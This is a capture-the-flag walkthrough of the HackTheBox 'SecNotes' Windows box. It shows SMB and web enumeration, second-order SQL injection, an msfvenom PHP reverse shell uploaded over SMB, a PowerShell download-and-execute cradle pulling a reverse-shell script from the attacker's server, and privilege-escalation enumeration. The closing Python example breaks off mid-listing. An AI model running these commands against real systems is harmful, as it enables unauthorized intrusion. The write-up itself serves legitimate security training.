HackTheBox – SecNotes

SecNotes is a tough box, and its creator is none other than 0xdf, who, apart from IppSec, provides some really good HTB walkthroughs. This box is notable because its intended exploitation route is a client-side exploit (i.e. one requiring user action, simulated by a script on the box), but an unintended route (as with Postman) was far more educational, although I’m not certain whether it is in scope for the PWK/OSCP. Because of this, the post below covers only the unintended route.

Side note: when I did this box I wasn’t alone, so some of the scans show things that shouldn’t be there.

Lessons learned

  • 2nd order SQL injection
  • Enumerating with Powershell instead of cmd
  • Windows subsystem on Linux

nmap error during enumeration

I encountered a strange nmap problem. If you get this error, follow these steps and replace nselib/smb.lua and scripts/smb-ls.nse to fix it.

nmap: nse_nsock.cc:369: void callback(nsock_pool, nsock_event, void*): Assertion `lua_status(L) == LUA_YIELD' failed.

Enumeration

Three ports are open: 80, 445 and 8808. 8808 is an unusual port for a web server to be listening on.

SMB 445

Checking for null-session shares found nothing.

root@Kali:~/HTB/SecNotes# smbmap -H 10.10.10.97
[+] Finding open SMB ports....
[!] Authentication error occured
[!] SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)
[!] Authentication error on 10.10.10.97

root@Kali:~/HTB/SecNotes# smbclient --no-pass -L //10.10.10.97
WARNING: The "syslog" option is deprecated
WARNING: The "syslog" option is deprecated
session setup failed: NT_STATUS_ACCESS_DENIED

Web 8808

Let’s check 8808 next. Landing page is the default IIS page.

dirbuster

nikto found nothing unusual, so let’s look at dirbuster.

shell.php is found, but that’s not supposed to be there (I checked and it was one of Kali’s default webshells), so technically there’s nothing on 8808. Moving on.

Web 80

The landing page is a login page.

Tested some default creds like

  • admin:admin
  • administrator:password

which all failed. I also tried testing for SQL injection with ' or 1=1;-- - without success.

dirbuster

Interestingly, dirbuster found a bunch of PHP pages.

But they were all inaccessible or redirected to the login page. Back on login.php, let’s try to create an account.

I tried a SQLi bypass here but nothing seemed to happen. Logging in with this account we see

Here we see a user tyler and the hostname secnotes.htb, which I added to /etc/hosts. These may come in useful later. We can create new notes as follows.

They don’t seem to do anything though. The intended exploitation path here requires you to test whether XSS is possible; if it is, that hints that a client-side attack is the vector. But I ignored all client-side exploits, so I missed that. Instead I tried a simple PHP payload, which was simply printed back without being executed.

Going to Contact Us showed this

I tried some messages but nothing seemed to happen.

Bruteforcing logins

At this point I went back to login.php and realised that entering garbage input for usernames returned the message

No account found with that username.

but if we provide a valid username such as the one we created or tyler we see instead

The password you entered was not valid.

I tried bruteforcing with hydra to find possible passwords from rockyou.txt but got a false positive: it reported a blank password as valid.

root@Kali:~/HTB/SecNotes# hydra -l tyler -P /usr/share/wordlists/rockyou.txt secnotes.htb http-post-form "/login.php :username=^USER^&password=^PASS^:F=password you entered was not valid:H=User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv\:60.0) Gecko/20100101 Firefox/60.0:H=Referer: http\://secnotes.htb/login.php:H=Cookie: PHPSESSID=qft12pmknvvdorjjhk95a69nlq" -v -f -I
Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-10-11 10:19:54
[INFORMATION] escape sequence \: detected in module option, no parameter verification is performed.
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://secnotes.htb:80/login.php :username=^USER^&password=^PASS^:F=password you entered was not valid:H=User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv\:60.0) Gecko/20100101 Firefox/60.0:H=Referer: http\://secnotes.htb/login.php:H=Cookie: PHPSESSID=qft12pmknvvdorjjhk95a69nlq
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[STATUS] 450.00 tries/min, 450 tries in 00:01h, 14343949 to do in 531:16h, 16 active
[STATUS] 429.67 tries/min, 1289 tries in 00:03h, 14343110 to do in 556:22h, 16 active
[STATUS] 415.00 tries/min, 2905 tries in 00:07h, 14341494 to do in 575:58h, 16 active
[80][http-post-form] host: secnotes.htb   login: tyler
[STATUS] attack finished for secnotes.htb (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-10-11 10:31:31

Some Googling showed the problem was with the rockyou.txt file: it contains blank lines, and a blank password returned a different error message (please enter a password), which didn’t match hydra’s failure string, so hydra counted it as a success. An important lesson learned, but one that doesn’t help us here. I abandoned this after reading the forum hints that bruteforcing wasn’t needed.

Second-order SQL injection

Now this is new to me. I didn’t manage to solve it on my own, but to do so you first need to understand what a second-order SQLi is. This page explains it well, together with example 2 of this article. In essence, a first-order SQLi is one where the injected input is executed by the database immediately and the effect shows up in the response to that same request, whereas a second-order SQLi is one where the injected string is stored and only executed later, when some downstream process reads it back and builds a query from it.

Why doesn’t it work the first time round? Typically it’s because input coming directly from the user isn’t trusted and is vetted and sanitised, while input read back from an internal source such as the database is trusted when it shouldn’t be. To pull off the second-order injection we first need to register a username containing the SQLi payload ' or 1=1-- - or any other SQLi bypass.
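To make the stored-then-executed pattern concrete, here is an added example (not code from the box or from 0xdf’s site) modelling it in Python with sqlite3 standing in for the site’s MySQL. The schema, tyler’s sample notes and the fixed variant are constructed assumptions, not the real SecNotes application. Registration and login are parameterised, so the payload is stored harmlessly; the notes query then concatenates the username read back from the database, which is the second-order sink, and the fixed version binds it instead.

```python
import sqlite3

# The username registered on the page (the SQLi payload).
PAYLOAD_USERNAME = "' or 1=1-- -"


def build_db():
    """Constructed in-memory stand-in for the site's database; the schema is an assumption."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT NOT NULL, password TEXT NOT NULL);
        CREATE TABLE notes (id INTEGER PRIMARY KEY, username TEXT NOT NULL, title TEXT NOT NULL);
        INSERT INTO notes (username, title) VALUES ('tyler', 'constructed sample note 1');
        INSERT INTO notes (username, title) VALUES ('tyler', 'constructed sample note 2');
    """)
    return conn


def register(conn, username, password):
    """Registration is parameterised, so the payload is stored verbatim and nothing fires yet."""
    # Plaintext password for brevity; a real application would hash it.
    conn.execute("INSERT INTO users (username, password) VALUES (?, ?)", (username, password))
    conn.commit()


def login(conn, username, password):
    """Login is also parameterised; it hands back the stored username as a now-'trusted' value."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def notes_for_vulnerable(conn, session_username):
    """Second-order sink: the username read back from the DB is concatenated into a new query."""
    sql = "SELECT username, title FROM notes WHERE username = '" + session_username + "'"
    return conn.execute(sql).fetchall()


def notes_for_fixed(conn, session_username):
    """Same query with a bound parameter: the stored payload is just a string to compare against."""
    return conn.execute(
        "SELECT username, title FROM notes WHERE username = ?", (session_username,)
    ).fetchall()


def demo():
    """Run the whole flow with the payload username and return (vulnerable result, fixed result)."""
    conn = build_db()
    register(conn, PAYLOAD_USERNAME, "anything")
    who = login(conn, PAYLOAD_USERNAME, "anything")
    return notes_for_vulnerable(conn, who), notes_for_fixed(conn, who)


if __name__ == "__main__":
    vulnerable, fixed = demo()
    print("vulnerable query returned", vulnerable)  # both of tyler's notes
    print("fixed query returned", fixed)            # nothing
```

The point to notice is that no single request looks injectable: the INSERT and the login SELECT are safe, and the username string only becomes SQL when the notes page trusts what it read from its own table. The fix is the same as for first-order injection, bind every value regardless of where it came from.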

Once created we login and see

Those look like credentials. Since this is Windows and SSH isn’t running, we can check whether they grant SMB share access. For how exactly the second-order SQLi works, refer to here.

Enumerating SMB share as tyler

root@Kali:~/HTB/SecNotes# smbmap -u 'tyler' -p '92g!mA8BGjOirkL%OG*&' -H secnotes.htb
[+] Finding open SMB ports....
[+] User SMB session establishd on secnotes.htb...
[+] IP: secnotes.htb:445	Name: secnotes.htb                                      
	Disk                                                  	Permissions
	----                                                  	-----------
	ADMIN$                                            	NO ACCESS
	C$                                                	NO ACCESS
	IPC$                                              	READ ONLY
	new-site                                          	READ, WRITE

We are able to see something new here, specifically new-site. I checked the default readable IPC$ share but didn’t find anything interesting. Enumerating the new-site share we see

root@Kali:~/HTB/SecNotes# smbmap -u 'tyler' -p '92g!mA8BGjOirkL%OG*&' -H secnotes.htb -R new-site
[+] Finding open SMB ports....
[+] User SMB session establishd on secnotes.htb...
[+] IP: secnotes.htb:445	Name: secnotes.htb                                      
	Disk                                                  	Permissions
	----                                                  	-----------
	new-site                                          	READ, WRITE
	.\
	dr--r--r--                0 Sun Oct 11 13:59:31 2020	.
	dr--r--r--                0 Sun Oct 11 13:59:31 2020	..
	-r--r--r--              696 Fri Jun 22 04:15:36 2018	iisstart.htm
	-r--r--r--            98757 Fri Jun 22 04:15:38 2018	iisstart.png
	dr--r--r--                0 Sun Oct 11 04:31:31 2020	Microsoft
	-r--r--r--               35 Sun Oct 11 05:09:30 2020	shell.php
	.\\Microsoft\
	dr--r--r--                0 Sun Oct 11 04:31:31 2020	.
	dr--r--r--                0 Sun Oct 11 04:31:31 2020	..
	dr--r--r--                0 Sun Oct 11 04:31:31 2020	Windows
	.\\Microsoft\Windows\
	dr--r--r--                0 Sun Oct 11 04:31:31 2020	.
	dr--r--r--                0 Sun Oct 11 04:31:31 2020	..
	dr--r--r--                0 Sun Oct 11 04:31:31 2020	PowerShell
	.\\Microsoft\Windows\PowerShell\
	dr--r--r--                0 Sun Oct 11 04:31:31 2020	.
	dr--r--r--                0 Sun Oct 11 04:31:31 2020	..
	-r--r--r--            58407 Sun Oct 11 05:41:56 2020	ModuleAnalysisCache

OK, shell.php isn’t supposed to be there, but iisstart.htm is. Since this page is served on 8808 and we can write to this directory, maybe we can get a PHP shell on web port 8808?

PHP reverse shell

Let’s first get a PHP reverse shell with msfvenom

root@Kali:~/HTB/SecNotes# msfvenom -a php --platform php -p php/reverse_php LHOST=10.10.14.78 LPORT=443 -f raw -o shell443.php
No encoder specified, outputting raw payload
Payload size: 3025 bytes
Saved as: shell443.php

and upload it

root@Kali:~/HTB/SecNotes# smbclient -U 'tyler' \\\\secnotes.htb\\new-site
WARNING: The "syslog" option is deprecated
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\tyler's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Aug 20 02:06:14 2018
  ..                                  D        0  Mon Aug 20 02:06:14 2018
  iisstart.htm                        A      696  Thu Jun 21 23:26:03 2018
  iisstart.png                        A    98757  Thu Jun 21 23:26:03 2018

		12978687 blocks of size 4096. 8089826 blocks available
smb: \> put shell443.php
putting file shell443.php as \shell443.php (32.9 kb/s) (average 32.9 kb/s)
smb: \> exit

Trigger it with curl

root@Kali:~/HTB/SecNotes# curl http://secnotes.htb:8808/shell443.php

and we get a cmd shell

root@Kali:~/HTB/SecNotes# rlwrap -r nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.78] from (UNKNOWN) [10.10.10.97] 62606
whoami && ipconfig
secnotes\tyler

Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 10.10.10.97
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.10.10.2

However, this shell dies fairly quickly, so it’s imperative to either upload nc.exe and run that or get a Powershell reverse shell. I opted for the PS reverse shell. I had nishang’s PS script ready (renamed to rshell.ps1, with all comments removed and a line added to execute it) and ran this in the PHP shell

powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.78/rshell.ps1')"

This downloaded the script from our Python server

root@Kali:~/HTB/SecNotes# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.97 - - [11/Oct/2020 14:19:02] "GET /rshell.ps1 HTTP/1.1" 200 -

and got a PS reverse shell

root@Kali:~/HTB/SecNotes# rlwrap -r nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.78] from (UNKNOWN) [10.10.10.97] 62612
Windows PowerShell running as user SECNOTES$ on SECNOTES
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\inetpub\new-site>

Now let’s check the .NET Framework version to see which winPEAS version should be run.

PS C:\inetpub\new-site> dir C:\Windows\Microsoft.NET\Framework


    Directory: C:\Windows\Microsoft.NET\Framework


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----        6/21/2018   6:47 PM                v1.0.3705                                                             
d-----        6/21/2018   6:47 PM                v1.1.4322                                                             
d-----        4/11/2018   4:38 PM                v2.0.50727                                                            
d-----       10/10/2020  12:52 PM                v4.0.30319                                                            
-a----        4/11/2018   4:33 PM           7680 sbscmp10.dll                                                          
-a----        4/11/2018   4:33 PM           7680 sbscmp20_mscorwks.dll                                                 
-a----        4/11/2018   4:33 PM           7680 sbscmp20_perfcounter.dll                                              
-a----        4/11/2018   4:33 PM           7680 sbs_diasymreader.dll                                                  
-a----        4/11/2018   4:33 PM           7680 sbs_microsoft.jscript.dll                                             
-a----        4/11/2018   4:33 PM           7680 sbs_mscordbi.dll                                                      
-a----        4/11/2018   4:33 PM           7680 sbs_mscorrc.dll                                                       
-a----        4/11/2018   4:33 PM           7680 sbs_mscorsec.dll                                                      
-a----        4/11/2018   4:33 PM           7680 sbs_system.configuration.install.dll                                  
-a----        4/11/2018   4:33 PM           7680 sbs_system.data.dll                                                   
-a----        4/11/2018   4:33 PM           7680 sbs_system.enterpriseservices.dll                                     
-a----        4/11/2018   4:33 PM           7680 sbs_wminet_utils.dll                                                  
-a----        4/11/2018   4:33 PM           7680 SharedReg12.dll

No 4.5 listed, so we can’t use the latest winPEAS. An older compiled version should work.

Failed winPEAS.exe download via FTP

To get winPEAS.exe onto the box I first tried using the Windows FTP client to download it from a Kali-hosted FTP server, as shown here. However, I encountered two problems. Firstly, for some reason it wouldn’t let me download exe files over FTP, deeming them a virus. Secondly, I got the error

421 Active data channel timed out.

These issues are explored here. Ultimately, what worked was using Powershell’s DownloadFile method.

PS C:\Users\tyler\Temp> (New-Object Net.WebClient).DownloadFile('http://10.10.14.78/winPEASx64.exe','C:\Users\tyler\Temp\winPEASx64.exe')
PS C:\users\tyler\Temp> .\winPEASx64.exe cmd > output.txt

PS C:\users\tyler\Temp> dir output.txt


    Directory: C:\users\tyler\Temp


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-a----       10/11/2020  12:38 AM         106530 output.txt     

Unfortunately, winPEAS didn’t find anything notable. Next I tried PowerUp.ps1 and PrivescCheck. To run both scripts in a PS shell, change the execution policy and then import the modules from the scripts.

PS C:\Users\tyler\Temp> Set-ExecutionPolicy Bypass -Scope process -Force

PS C:\users\tyler\Temp> Import-Module C:\users\tyler\Temp\PowerUp.ps1

PowerUp couldn’t open the Service Control Manager and as a result produced no findings.

PS C:\Users\tyler\Temp> Invoke-AllChecks | Tee-Object "powerup.txt"
PS C:\Users\tyler\Temp> rshell : Cannot open Service Control Manager on computer '.'. This operation might require other privileges.
At line:90 char:1
+ rshell -Reverse -IPAddress 10.10.14.78 -Port 443
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [Write-Error], WriteErrorException
    + FullyQualifiedErrorId : Microsoft.PowerShell.Commands.WriteErrorException,rshell
 

PS C:\Users\tyler\Temp> type powerup.txt

[*] Running Invoke-AllChecks


[*] Checking if user is in a local group with administrative privileges...


[*] Checking for unquoted service paths...


[*] Checking service executable and argument permissions...


[*] Checking service permissions...

PrivescCheck couldn’t even be imported.

PS C:\users\tyler\Temp> Import-Module C:\users\tyler\Temp\PrivescCheck.ps1
PS C:\users\tyler\Temp> Add-Type : Cannot add type. Compilation errors occurred.
At C:\users\tyler\Temp\PrivescCheck.ps1:382 char:5
+     Add-Type -MemberDefinition $CSharpSource -Name 'Win32' -Namespace ...
+     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidData: (:) [Add-Type], InvalidOperationException
    + FullyQualifiedErrorId : COMPILER_ERRORS,Microsoft.PowerShell.Commands.AddTypeCommand

Running services restricted from outside

Normally I check only port numbers below 10,000; higher ports tend to be RPC and typically don’t lead anywhere. We see

TCP       0.0.0.0:3306                                  Listening

which tells us a SQL instance is running, and it appears in the list of running services as

    MySQL80(MySQL80)["C:\Program Files\MySQL\MySQL Server 8.0\bin\mysqld.exe" --defaults-file="C:\ProgramData\MySQL\MySQL Server 8.0\my.ini" MySQL80] - Autoload

As it led nowhere I won’t cover it here. Refer to this for more information.

Checking for password reuse

With the credentials obtained, I checked to see if the Administrator password reused either tyler’s or the one in the MySQL DB. Nothing.

Enumerating with Powershell

For this box I enumerated mostly using Powershell, since we have a PS shell. A couple of things to check out. To list all files/folders, including hidden ones, in Powershell instead of dir /a we do this

PS C:\Users\tyler\Recent> dir : Access to the path 'C:\Users\tyler\Recent' is denied.
At line:1 char:1
+ dir -Force
+ ~~~~~~~~~~
    + CategoryInfo          : PermissionDenied: (C:\Users\tyler\Recent:String) [Get-ChildItem], UnauthorizedAccessExce 
   ption
    + FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand

Strangely, it is blocked. But when I dropped to an nc shell, I saw that Recent was a junction link and was able to follow it to a path where I could list its contents.

C:\Users\tyler>cd C:\Users\tyler\AppData\Roaming\Microsoft\Windows\Recent
cd C:\Users\tyler\AppData\Roaming\Microsoft\Windows\Recent

C:\Users\tyler\AppData\Roaming\Microsoft\Windows\Recent>dir /a
dir /a
 Volume in drive C has no label.
 Volume Serial Number is 9CDD-BADA

 Directory of C:\Users\tyler\AppData\Roaming\Microsoft\Windows\Recent

08/19/2018  11:08 AM    <DIR>          .
08/19/2018  11:08 AM    <DIR>          ..
06/21/2018  09:55 AM               971 753af751b8be45e9cd250078982d8924caa22b89.lnk
08/19/2018  09:56 AM    <DIR>          AutomaticDestinations
08/19/2018  11:05 AM               804 bla.lnk
08/19/2018  11:05 AM               804 blu.lnk
06/22/2018  03:48 AM               799 change_pass.php.lnk
06/22/2018  01:51 PM               849 check-messages.lnk
08/19/2018  11:08 AM               694 cleanup (2).lnk
08/19/2018  11:08 AM               514 cleanup.lnk
10/10/2020  12:45 PM    <DIR>          CustomDestinations
08/19/2018  03:51 PM               432 desktop.ini
06/22/2018  02:16 PM               797 Desktop.lnk
06/22/2018  03:40 AM               808 etc.lnk
06/21/2018  02:16 PM               760 home.php.lnk
06/22/2018  03:40 AM               970 hosts.lnk
08/19/2018  09:28 AM               206 http--go.microsoft.com-fwlink-LinkID=626473.lnk
08/19/2018  09:29 AM               154 ms-settingsnetwork.lnk
06/22/2018  07:28 PM             1,662 New folder.lnk
08/19/2018  11:05 AM               655 new-site.lnk
06/22/2018  03:47 AM               784 register.php.lnk
06/22/2018  02:16 PM               976 root.lnk
06/22/2018  07:28 PM             1,556 secnotes (VBOXSVR) (2).lnk
06/22/2018  07:28 PM             1,556 secnotes (VBOXSVR).lnk
06/22/2018  01:51 PM               612 secnotes_contacts.lnk
06/21/2018  02:23 PM             1,729 startup.cmd.lnk
06/21/2018  02:23 PM             1,419 Startup.lnk
08/19/2018  11:02 AM               811 test.lnk
08/19/2018  10:51 AM               104 The Internet.lnk
06/21/2018  09:39 AM             1,707 tyler-secnotes_contacts.lnk
08/19/2018  10:54 AM               545 tyler.lnk
08/19/2018  09:22 AM               527 user.lnk
06/22/2018  02:11 PM               551 user.txt.lnk
08/19/2018  10:54 AM               465 Users.lnk
08/19/2018  09:56 AM               154 windowsdefender---.lnk
08/19/2018  09:57 AM               166 windowsdefender--threat-.lnk
06/22/2018  03:48 AM               605 wwwroot.lnk
06/21/2018  06:11 PM             1,960 xxxtxxx.lnk
              34 File(s)         28,106 bytes
               4 Dir(s)  33,114,161,152 bytes free

I checked a few of these shortcut files to see if they linked anywhere interesting but got nowhere. Never mind. To check permissions of files/folders, instead of icacls in cmd we do either

PS C:\inetpub\temp> Get-Acl C:\Users\tyler | Select-Object -ExpandProperty Access

FileSystemRights  : FullControl
AccessControlType : Allow
IdentityReference : NT AUTHORITY\SYSTEM
IsInherited       : False
InheritanceFlags  : ContainerInherit, ObjectInherit
PropagationFlags  : None

FileSystemRights  : FullControl
AccessControlType : Allow
IdentityReference : BUILTIN\Administrators
IsInherited       : False
InheritanceFlags  : ContainerInherit, ObjectInherit
PropagationFlags  : None

FileSystemRights  : FullControl
AccessControlType : Allow
IdentityReference : SECNOTES\tyler
IsInherited       : False
InheritanceFlags  : ContainerInherit, ObjectInherit
PropagationFlags  : None

but that isn’t really readable. A more readable alternative is

PS C:\inetpub\temp> Get-Acl C:\Users\tyler | Select -Expand AccessToString
NT AUTHORITY\SYSTEM Allow  FullControl
BUILTIN\Administrators Allow  FullControl
SECNOTES\tyler Allow  FullControl

As with icacls, however, if we don’t have permission to read an object’s ACL we still get an error.

PS C:\inetpub\temp> rshell : Attempted to perform an unauthorized operation.
At line:90 char:1
+ rshell -Reverse -IPAddress 10.10.14.78 -Port 443
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [Write-Error], WriteErrorException
    + FullyQualifiedErrorId : Microsoft.PowerShell.Commands.WriteErrorException,rshell

The command entered was overwritten by the error above, but it was

Get-Acl C:\Users\Administrator | Select -Expand AccessToString

If we check permissions for C:\Windows instead which we can read we see

PS C:\inetpub\temp> Get-Acl C:\Windows | Select -Expand AccessToString
CREATOR OWNER Allow  268435456
NT AUTHORITY\SYSTEM Allow  268435456
NT AUTHORITY\SYSTEM Allow  Modify, Synchronize
BUILTIN\Administrators Allow  268435456
BUILTIN\Administrators Allow  Modify, Synchronize
BUILTIN\Users Allow  -1610612736
BUILTIN\Users Allow  ReadAndExecute, Synchronize
NT SERVICE\TrustedInstaller Allow  268435456
NT SERVICE\TrustedInstaller Allow  FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow  ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow  -1610612736
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow  ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow  -1610612736

One thing to note here is that, unlike Bash, Powershell won’t tell you when a given sub-directory exists but is inaccessible to you. This is unlike Traverxec, where we could enter david’s home directory and see that a .ssh folder existed even though we couldn’t access it. Powershell just tells you the path doesn’t exist, even though it does.

PS C:\users> Get-Acl C:\Users\Administrator\Desktop | Select -Expand AccessToString
PS C:\users> Get-Acl : Cannot find path 'C:\Users\Administrator\Desktop' because it does not exist.
At line:1 char:1
+ Get-Acl C:\Users\Administrator\Desktop | Select -Expand AccessToStrin ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (:) [Get-Acl], ItemNotFoundException
    + FullyQualifiedErrorId : GetAcl_PathNotFound_Exception,Microsoft.PowerShell.Commands.GetAclCommand

In Powershell, the equivalent of net user comes out as

PS C:\$Recycle.Bin> Get-LocalUser | Select *

AccountExpires         : 
Description            : Built-in account for administering the computer/domain
Enabled                : True
FullName               : 
PasswordChangeableDate : 6/21/2018 12:59:29 PM
PasswordExpires        : 
UserMayChangePassword  : True
PasswordRequired       : True
PasswordLastSet        : 6/21/2018 12:59:29 PM
LastLogon              : 8/19/2018 11:11:34 AM
Name                   : Administrator
SID                    : S-1-5-21-1791094074-1363918840-4199337083-500
PrincipalSource        : Local
ObjectClass            : User

AccountExpires         : 
Description            : A user account managed by the system.
Enabled                : False
FullName               : 
PasswordChangeableDate : 
PasswordExpires        : 
UserMayChangePassword  : True
PasswordRequired       : False
PasswordLastSet        : 
LastLogon              : 
Name                   : DefaultAccount
SID                    : S-1-5-21-1791094074-1363918840-4199337083-503
PrincipalSource        : Local
ObjectClass            : User

AccountExpires         : 
Description            : Built-in account for guest access to the computer/domain
Enabled                : False
FullName               : 
PasswordChangeableDate : 
PasswordExpires        : 
UserMayChangePassword  : False
PasswordRequired       : False
PasswordLastSet        : 
LastLogon              : 
Name                   : Guest
SID                    : S-1-5-21-1791094074-1363918840-4199337083-501
PrincipalSource        : Local
ObjectClass            : User

AccountExpires         : 
Description            : 
Enabled                : True
FullName               : 
PasswordChangeableDate : 6/21/2018 12:58:00 PM
PasswordExpires        : 
UserMayChangePassword  : False
PasswordRequired       : False
PasswordLastSet        : 6/21/2018 12:58:00 PM
LastLogon              : 10/12/2020 9:11:26 AM
Name                   : tyler
SID                    : S-1-5-21-1791094074-1363918840-4199337083-1002
PrincipalSource        : Local
ObjectClass            : User

AccountExpires         : 
Description            : A user account managed and used by the system for Windows Defender Application Guard 
                         scenarios.
Enabled                : False
FullName               : 
PasswordChangeableDate : 6/21/2018 5:47:42 PM
PasswordExpires        : 8/2/2018 5:47:42 PM
UserMayChangePassword  : True
PasswordRequired       : True
PasswordLastSet        : 6/21/2018 5:47:42 PM
LastLogon              : 
Name                   : WDAGUtilityAccount
SID                    : S-1-5-21-1791094074-1363918840-4199337083-504
PrincipalSource        : Local
ObjectClass            : User

which also lists their respective SIDs. I also enumerated the Recycle Bin to check whether there were any credentials, but since that didn’t lead anywhere you can read about it here.

Enumerating non-Windows programs

If you look at tyler’s desktop you’ll see this non-standard, non-Windows shortcut to Bash.

C:\Users\tyler\Desktop>dir /a
dir /a
 Volume in drive C has no label.
 Volume Serial Number is 9CDD-BADA

 Directory of C:\Users\tyler\Desktop

08/19/2018  03:51 PM    <DIR>          .
08/19/2018  03:51 PM    <DIR>          ..
06/22/2018  03:09 AM             1,293 bash.lnk
04/11/2018  04:34 PM             1,142 Command Prompt.lnk
08/19/2018  03:51 PM               572 desktop.ini
04/11/2018  04:34 PM               407 File Explorer.lnk
06/21/2018  05:50 PM             1,417 Microsoft Edge.lnk
06/21/2018  09:17 AM             1,110 Notepad++.lnk
08/19/2018  09:25 AM                34 user.txt
08/19/2018  10:59 AM             2,494 Windows PowerShell.lnk
               8 File(s)          8,469 bytes
               2 Dir(s)  33,114,161,152 bytes free

The root directory also shows there’s a C:\Distros\Ubuntu for which we have execute rights.

PS C:\Distros> dir -Force


    Directory: C:\Distros


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----        6/21/2018   5:59 PM                Ubuntu                                                                
PS C:\Distros\Ubuntu> dir -Force


    Directory: C:\Distros\Ubuntu


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----        6/21/2018   3:07 PM                AppxMetadata                                                          
d-----        6/21/2018   3:07 PM                Assets                                                                
d-----        6/21/2018   3:07 PM                images                                                                
d-----        6/21/2018   5:51 PM                temp                                                                  
-a----        7/11/2017   6:10 PM         190434 AppxBlockMap.xml                                                      
-a----        7/11/2017   6:10 PM           2475 AppxManifest.xml                                                      
-a----        7/11/2017   6:11 PM          10554 AppxSignature.p7x                                                     
-a----        7/11/2017   6:10 PM      201254783 install.tar.gz                                                        
-a----        7/11/2017   6:10 PM           4840 resources.pri                                                         
-a----        7/11/2017   6:10 PM         222208 ubuntu.exe                                                            
-a----        7/11/2017   6:10 PM            809 [Content_Types].xml                                                   
PS C:\Distros\Ubuntu> Get-Acl ubuntu.exe | Select -Expand AccessToString
BUILTIN\Administrators Allow  FullControl
NT AUTHORITY\SYSTEM Allow  FullControl
BUILTIN\Users Allow  ReadAndExecute, Synchronize
NT AUTHORITY\Authenticated Users Allow  Modify, Synchronize
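The AccessToString listings above (for C:\Windows earlier and for ubuntu.exe here) contain two things worth being able to read quickly: raw numbers such as 268435456 and -1610612736, which PowerShell prints when an ACE carries generic rights it cannot map onto the FileSystemRights enum, and ACEs that hand write access to low-privileged groups, as Authenticated Users having Modify on ubuntu.exe does. The following is an added example, not code from the box or the write-up: a small Python parser for that output that decodes the generic-rights masks (GENERIC_READ 0x80000000, GENERIC_WRITE 0x40000000, GENERIC_EXECUTE 0x20000000, GENERIC_ALL 0x10000000 from winnt.h) and flags entries where a broad principal can modify the object. The sample ACL text is copied from the listings on this page; the set of principals treated as low-privileged is my assumption.

```python
import re

# Generic access rights from winnt.h. PowerShell shows an ACE's mask as a signed
# Int32 when it cannot express it in FileSystemRights names, hence the odd numbers.
GENERIC_RIGHTS = {
    0x80000000: "GENERIC_READ",
    0x40000000: "GENERIC_WRITE",
    0x20000000: "GENERIC_EXECUTE",
    0x10000000: "GENERIC_ALL",
}

# Rights that let a principal change the object: named FileSystemRights forms plus
# the generic bits that imply write access.
WRITE_LIKE = {"FullControl", "Modify", "Write", "WriteData", "AppendData",
              "GENERIC_WRITE", "GENERIC_ALL"}

# Principals every low-privileged account on the host belongs to (assumption).
LOW_PRIV = {r"BUILTIN\Users", r"NT AUTHORITY\Authenticated Users", "Everyone"}

# Sample input copied from the page's Get-Acl output.
WINDOWS_ACL = r"""
CREATOR OWNER Allow  268435456
NT AUTHORITY\SYSTEM Allow  268435456
NT AUTHORITY\SYSTEM Allow  Modify, Synchronize
BUILTIN\Administrators Allow  268435456
BUILTIN\Administrators Allow  Modify, Synchronize
BUILTIN\Users Allow  -1610612736
BUILTIN\Users Allow  ReadAndExecute, Synchronize
NT SERVICE\TrustedInstaller Allow  268435456
NT SERVICE\TrustedInstaller Allow  FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow  ReadAndExecute, Synchronize
"""

UBUNTU_EXE_ACL = r"""
BUILTIN\Administrators Allow  FullControl
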